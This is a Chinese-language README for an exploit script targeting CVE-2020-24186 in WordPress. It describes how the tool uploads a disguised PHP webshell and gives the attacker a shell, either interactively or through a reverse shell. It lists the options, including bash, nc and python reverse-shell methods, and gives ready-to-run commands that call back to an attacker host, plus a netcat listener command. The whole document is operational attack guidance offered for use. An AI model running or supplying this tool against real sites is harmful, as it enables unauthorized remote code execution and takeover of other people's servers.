该脚本利用 WordPress 中的 CVE-2020-24186 漏洞,上传伪装后的 PHP 负载并在目标系统上获取 Shell。共有三种操作模式:
交互式 Shell:
上传基础 WebShell 并进入交互模式,允许您通过 cmd 参数发送命令。
手动反弹 Shell:
上传 WebShell 并发送反弹 Shell 负载,但 不会 自动启动监听器。您需要在指定的 IP 和端口上手动启动自己的监听器。
使用 pwntools 反弹 Shell:
上传 WebShell,发送反弹 Shell 负载,脚本会自动使用 pwntools 启动监听器以捕获反弹连接。
requestspwn (pwntools)--url:目标站点的基础 URL(例如 http://10.10.110.119)。--blogpath:文章的路径(默认值:/?page=1)。--mode:操作模式,可选 interactive 或 reverse。--lhost:反弹 Shell 的本地 IP(反弹模式必需)。--lport:反弹 Shell 的本地端口(反弹模式必需)。--reverse_method:反弹 Shell 方法:bash、nc 或 python(默认 bash)。--manual:在反弹模式下使用,脚本 不会 启动监听器,您必须手动启动自己的监听器。--use-proxy:若设置,请求将通过配置的代理发送。上传 WebShell 并启动交互式会话以发送命令:
python3 CVE-2020-24186.py --url http://10.10.110.119 --blogpath "/?page=1" --mode interactive --use-proxy
上传 WebShell,发送反弹 Shell 负载,但不会自动启动监听器。手动启动自己的监听器(例如使用 netcat):
python3 CVE-2020-24186.py --url http://10.10.110.119 --blogpath "/?page=1" --mode reverse --lhost 10.10.1.1 --lport 9002 --reverse_method bash --manual --use-proxy
然后,在另一个终端中手动启动监听器:
nc -lvnp 9002
上传 WebShell,发送反弹 Shell 负载,脚本自动使用 pwntools 启动监听器以捕获连接:
python3 CVE-2020-24186.py --url http://10.10.110.119 --blogpath "/?page=1" --mode reverse --lhost 10.10.1.1 --lport 9002 --reverse_method bash --use-proxy
脚本将在 10.10.1.1:9002 上等待连接,连接成功后提供一个交互式 Shell。
--php_payload 选项进行修改。--use-proxy 标志时,请仔细检查代理设置。